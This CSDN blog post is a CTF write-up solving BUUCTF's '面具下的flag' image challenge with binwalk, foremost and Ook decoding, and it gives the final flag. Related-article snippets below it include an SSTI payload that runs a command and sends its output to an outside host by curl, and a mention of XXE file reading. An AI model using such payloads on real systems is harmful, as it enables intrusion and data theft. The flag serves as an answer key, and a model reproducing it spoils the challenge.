buuctf_misc_面具下的flag

最新推荐文章于 2024-09-17 13:39:13 发布
最新推荐文章于 2024-09-17 13:39:13 发布
阅读量486 收藏 9
点赞数 5
文章标签: chrome 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73118788/article/details/136392976
版权
本文讲述了作者在解决一道与《你的名字》联动的题目时,使用了winhex、LSB分析、kalikali上的payload以及Linux工具foremost的过程,途中遇到的系统更新、权限问题和不同平台操作的差异都被详细记录。
摘要由CSDN通过智能技术生成

题目tm:
在这里插入图片描述
看到《你的名字》的联动,我开始做这题是很开心的。但!这题我要狠狠的记录!下面开始我的解题历程:
winhex,没看到啥,但看出来图片里面藏东西了
LSB看一眼,没啥。图片属性,没大问题。下一招,上kali
kali上第一个payload:

binwalk -e mianju.jpg

(这里-e啥作用有待学习,有没有-e在这似乎没有影响)

结果:
在这里插入图片描述
我当时没管他,没往里面看,我开始按这下面博主复刻的:

http://t.csdnimg.cn/r6KqE

之后我就foremost mianju.jpg分离呗
结果告我foremost没下,那我就apt-get install foremost安装呗,结果不行,我看这之前要sudo apt-get update:结果又告我:
在这里插入图片描述
哥们好一顿找,说我kali要换源,我这阿里云的不行了,我换呗:

http://t.csdnimg.cn/SXYjC
http://t.csdnimg.cn/k7mfn
记得sudo vim /etc/apt/sources.list进入,按i编辑,esc退出编辑,:wq和enter保存并退出

换好了,中科大的,then运行 sudo apt update 命令来让系统更新软件包列表以应用修改后的软件源。呵,哥们没数字签名。
在这里插入图片描述
解决:

wget archive.kali.org/archive-key.asc
apt-key add archive-key.asc

俩指令一放,好嘞:
在这里插入图片描述
(当然我这记录得都是解决该问题正确的路线to me,中间看的其他博客和走的弯路不记录了)
然后下载好了foremost,按开始的WP复刻呗:
在这里插入图片描述
我实验复刻出来的不一样呐!?!(最后在这题foremost没用上)
在这里插入图片描述
在这里插入图片描述
(留个问,这文件夹右下角"叉"什么意思,里面文件依然地,权限不够打不开)rm -rf output
找了许多,感谢下面这位大佬

https://www.cnblogs.com/Zer0o/p/17232916.html

windows下的弯路我不在重复叙述了(虽然发现前就试了)
在这里插入图片描述
在kali里呢:
在这里插入图片描述结果:
在这里插入图片描述

这文件下的叉我准备想解决的(因为kali说权限不够,不给开),但突然想到,我windows怎么不行!!
把74DFE拉到windows桌面上,用7-zip打开压缩包,怎么就不行:
在这里插入图片描述
key_part_one点进去:
在这里插入图片描述
https://www.splitbrain.org/services/ook
在这里插入图片描述

flag{N7F5_AD5
下一个,key_part_two点进去:
在这里插入图片描述
oh。。。。。好,windows确实不行
在这里插入图片描述
kali文件夹我又打不开,嗯…我自己想到个办法!
在这里插入图片描述
这玩意贼有迷惑性,首先,key_part_two文件夹,在kail和windows打开是不一样的,二来,我kali打不开这文件夹,三来,这藏的另一个txt名字就很抽象
在这里插入图片描述
诶嗨,这么我就打开了带flag编码的txt(记得用cat,学一学linux指令)
在这里插入图片描述

得到结果:
_i5_funny!}
拼接:
flag{N7F5_AD5_i5_funny!}

WLQH
关注
BUUCTF 面具下的flag
Hrain7的博客
11-10 924
x 代表解压缩文件,并且是按原始目录树解压(还有个参数 e 也是解压缩文件,但其会将所有文件都解压到根下,而不是自己原有的文件夹下)解压压缩包,是flag.vmdk,当时卡到这儿了,不知道接下来怎么做了,然后看了网上的wp,说是7z可以解压vmdk文件。压缩源文件数据区是无加密的,然而压缩源文件目录区是加密的,所以可判断为是伪加密。-o 是指定解压到的目录, -o后是没有空格的,直接接目录。key_part_one文件夹里是Brainfuck加密。命令:7z x 需要解压的文件名 -r -o./
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1646
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
Misc
啊哦的博客
01-22 2070
签到题 题目链接 由于是图片,binwalk之后得到一系列 ,无果。。。。在看看winhex,直接看到flag(这题最坑!!!容易被里面的其他文件绕晕) 爆破 2333 题目链接下载后不知道是什么文件,binwalk之后看到zip,就改后缀名为.zip,打开后发现有个加密txt 按常理来先用工具爆破,但是发现还是找不到口令,再细细观察,题目中说是5位数,而文件大小也是5,所以这里的五
ctfshow 网络迷踪-你的名字+噶即正义
东海梦城的博客
03-14 623
ctfshow 你的名字 通过yandex识图找到图片,这题很简单。但是不太好找 直接得到答案 野菜山下商店 这题可能会比较难找 噶即正义 先通过百度识图得到这是《无法成为野兽的我们》剧照 通过百度识图找到这是居酒屋 再通过谷歌找到所对应啤酒的价格330日元 ...
[GWCTF 2019]你的名字
qq_43801002的博客
07-28 1380
题目 过程 1.在 ssti 中过滤了后, 可以通过{%外带 {% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://xx.xxx.xx.xx:8080/?i=ls /') %}1{% endif %} 由于有黑名单,这里使用得操作是利用blacklist里面最后一个进行绕过。 只要在其他语句加入他,那么就可以绕过其他语句了。 但是不知道他得blackl
BUUCTF-misc-面具下的flag
xiaozhangqian的博客
10-12 1636
一只大三小菜鸡的刷题记录~ 欢迎大佬指点! misc第一页剩下两道题,emmm,对我来说有点点难,所以特意来写wp,初次写此类文章,大家多多包涵~ 面具下的flag 废话:压缩包解压发现是个图片,010打开,看了看没有flag,想到了隐藏文件,打开kali binwalk /root/Desktop/mianju.jpg 得到这个 binwalk -e /root/Desktop/mianju.jpg 得到这个 分离出来一个压缩包,加密的.vmdk文件,之前没有接触过,..
BUUCTF misc 解题记录 一(超级详细)
热门推荐
qq_51090016的博客
03-16 1万+
持续更新一些不会的题目,有错误的还请大佬指点N种方法解决 N种方法解决 附件下载是一个exe文件,我还运行不了。。这咋办 改成txt文件看看 好像有什么东西藏在里面 前面有个jpg 还有base,用winhex打开看看 到这没思路了,看wp base64可以表示图片 这个让我这个菜鸡人傻了 转换网站点这 转换完还能帮你另存为,真不错 扫一下就OK了 ...
buuctf misc page 1
zip471642048的博客
02-23 2662
签到 flag{buu_ctf} 三逄 用gifframe打开,flag隐写在帧中 flag{he11ohongke} 二维码 你竟然赶我走 flag在16进制尾部 N种方法解决 010editor查看文件发现是base64形式的图片 扫码拿flag KEY{dca57f966e4e4e31fd5b15417da63269} 大白 修复图片高宽 import binascii import struct import sys file = input("图片地址:") fr = open(file,
buuctf-misc部分wp(更新一下)
a3uRa的一个窝
02-17 8311
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]纳尼 添加gif头 [BJDCTF2020]鸡你太美 添加gif头 [BJDCTF2020]just_a_rar 爆破 ss的file format [BJDCTF2020]认真你就输了 xls文件 binwalk [BJDCT...
NOI 2018 你的名字
04-04 126
因为机房里的小伙伴都在看《你的名字。》而我不想看 所以来写了这道题... 给一个 $S$ 串,$q$ 次询问,每次一个 $T$ 串,问 $T$ 有多少没在 $S[l,r]$ 中以子串形式出现过的本质不同的子串 $|S|,q \leq 5e5,\sum |T| \leq 5e5$ sol: 容斥一下就变成了 $T$ 与 $S[l,r]$ 有多少本质不同的公共子串 首先把 ...
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3421
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
CTF题库>实验吧>女神 (猫流大大发现一个女神,你能告诉我女神的名字么(名字即是flag))
qq_42777804的博客
08-18 965
下载后解压得到 直接用notepad++ 打开 nvshen.txt 可以看出来应该是 base64加密过的 1.直接进行解密 (notepad居然带有解密工具) (记得要全选中才行) 得到了 png开头的好多字符串 2.将文件另存为 .png 打开看看 居然不认识 尴尬ing 3.百度识图 哈哈哈哈 直接拖进去 ...
XXE漏洞学习之CTF
qq_46085232的博客
04-09 622
两道有关XXE的CTF题目盲猜过程总结Vulnhub练习题过程总结 盲猜 题目地址:http://web.jarvisoj.com:9882/ 过程 访问题目地址 提交数据,进行抓包 看到数据提交这里,以为是基于json格式的sql注入,结果不是的,看页面源代码也看不出啥的,只怪自己的太菜。后来,才知道这里靠xxe漏洞,盲猜服务端能接受xml格式数据,修改Content-tpye值,并提交xml格式的playload。 修改数据包,进行提交,获取flag(这里我通过读取etc/passwd知道有hom
进程优先级和环境变量
大学生一枚
09-14 1069
命令行中启动的程序,都会变成进程,其实都是bash的子进程,父进程的数据,默认对于子进程是能看到并访问的,但是子进程的后续修改,对于父进程是看不到的,系统中的很多配置,在我们登录linux系统的时候,就已经被加载到bash进程中(内存),最开始的环境变量在配置文件中,然后被加载到bash中,nice的调整是有限制的,修改范围位[-20,19],而且每次调整优先级,PRI的值都是从80开始的,避免修改叠加。cpu资源分配的先后顺序,就是指进程的优先级,linux中进程的优先级数字越小,优先级越高;
下载chromedriver驱动
2301_79144798的博客
09-12 494
关于ChromeDriver最新下载地址:
进程间关系与进程守护
最新发布
qhy850716的博客
09-17 697
每一个进程除了有一个进程ID(PID)之外 还属于一个进程组,每一个进程组也有一个唯一的进程组 ID(PGID), 并且这个 PGID 类似于进程 ID, 同样是一个正整数, 可以存放在 pid_t 数据类型中。
安装node 报错需要:glibc >= 2.28
gs80140的专栏
09-12 654
错误:软件包:2:nodejs-18.20.4-1nodesource.x86_64 (nodesource-nodejs)错误:软件包:2:nodejs-18.20.4-1nodesource.x86_64 (nodesource-nodejs)错误:软件包:2:nodejs-18.20.4-1nodesource.x86_64 (nodesource-nodejs)错误:软件包:2:nodejs-18.20.4-1nodesource.x86_64 (nodesource-nodejs)
__USE_MISC未被自动启用
06-10
你说得对,我之前的回答是不准确的。在Linux系统中,__USE_MISC并不会被自动启用,它需要显式地被定义才能启用非标准的UNIX系统调用或结构体定义。通常情况下,在包含特定头文件之前,可以使用预处理指令 #define __USE_MISC 来启用__USE_MISC宏定义。例如,如果你想在程序中使用非标准的网络接口结构体定义,可以在包含net/if.h头文件之前,添加以下代码: ```c #define __USE_MISC #include <net/if.h> ``` 这样就可以启用__USE_MISC宏定义,以便使用非标准的网络接口结构体定义了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值